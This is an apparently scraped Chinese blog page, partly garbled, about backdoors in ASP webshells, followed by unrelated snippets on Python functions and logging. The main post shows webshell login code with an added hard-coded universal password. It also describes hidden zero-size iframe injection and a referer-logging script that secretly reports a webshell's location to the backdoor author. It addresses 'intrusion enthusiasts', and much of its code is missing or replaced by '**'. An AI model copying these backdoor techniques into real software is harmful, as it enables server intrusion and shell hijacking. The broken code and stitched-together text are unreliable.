揭密如何寫ASP木馬後門

2021-07-24 13:50:17 字數 993 閱讀 5833

正常的:

end function  if session("web2a2dmin")<>userpass then  if request.form("pass")<>"" then  if request.form("pass")=userpass then  session("web2a2dmin")=userpass  response.redirect url  else  rrs"對不起,密碼驗證失敗!"
加有萬能密碼

的:

end function  if session("web2a2dmin")<>userpass then  if request.form("pass")<>"" then  if request.form("pass")=userpass or request.form("pass")="1111111" then  session("web2a2dmin")=userpass  response.redirect url  else  rrs"對不起,密碼驗證失敗!"
1111111就是傳說中的萬能密碼了。

找到萬能密碼**後把or request.form("pass")="1111111" 刪除就ok了!

下面來找馬大多數都喜歡用框架掛馬:後門

位址 width=0 height=0>

找到後刪了,到此asp

後門就算剔除了!

下面教大家後門

的原理:

這是一段

收信的asp

**將其儲存為1.asp

**基本意思就是:「http_referer」 鏈結

到當前頁面的前一頁面的 url 位址

簡單來說就是獲得webshell

的位址然後記錄在bobo.txt這裡文字裡

上傳到空間比如 http://

127.0.0.1/1.asp

然後裡用

插到asp木馬中

那麼別人訪問這個被掛了馬的asp木馬就會生成個bobo.txt裡面就會有asp大馬的路徑了

ASP木馬後門檢測

圖 文 張馨餘 作為乙個入侵愛好者,你是否想到過自己辛苦入侵後留下的asp木馬會是有後門的呢?今天我們就來看看如何查詢asp木馬的後門,方法超級簡單。首先用解密工具將加密的asp木馬解密,再用文字方式開啟解密後的asp木馬,仔細查詢,發現一處 prevres p urevres u 2 da?da ...

python函式如何寫 python如何寫函式

python函式的定義 定義函式,也就是建立乙個函式,可以理解為建立乙個具有某些用途的工具。定義函式需要用 def 關鍵字實現,具體的語法格式如下 def 函式名 形參列表 由零條到多條可執行語句組成的 塊 return 返回值 其中,用 括起來的為可選擇部分,即可以使用,也可以省略。此格式中,各部...

python如何寫日誌 python如何寫日誌

這篇文章介紹了 python 的 logging 模組,包括它的設計以及針對更多複雜案例的適用方法。這篇文章不是寫給開發者的文件,它更像是乙個指導手冊,來說明 python 的 logging 模板是如何搭建的,並且激發感興趣的人深入研究。為什麼使用 logging 模組?也許會有開發者會問,為什麼...